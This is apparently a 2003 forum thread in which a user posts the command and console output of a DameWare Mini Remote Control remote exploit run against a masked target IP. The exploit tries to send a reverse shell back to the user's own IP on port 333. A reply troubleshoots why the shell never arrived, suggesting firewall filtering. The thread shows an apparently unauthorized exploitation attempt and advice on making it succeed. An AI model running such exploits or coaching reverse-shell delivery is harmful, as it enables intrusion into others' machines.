C:\hack\dmware>dameweird xxx.xx.xxx.xxx xx.xxx.xx.xxx 333

     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.xxx.xxx                 ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     : 6
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Done
[i] Shell should be arrived at xx.xxx.xx.xxx:333


but no shell arrived, damn damn damn
Double-=V=-
QUOTE (Killahbee @ Dec 21 2003, 06:50 PM)
But every time the same old message:

CODE

C:\hack\dmware>dameweird xxx.xx.xxx.xxx xx.xxx.xx.xxx 333

     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.xxx.xxx                 ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     : 6
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Done
[i] Shell should be arrived at xx.xxx.xx.xxx:333


but no shell arrived, damn damn damn

Well, maybe the host is firewalled: the shell has to connect out from the target to your IP and port, so an outbound filter on their side (or an inbound one on yours) means it never arrives.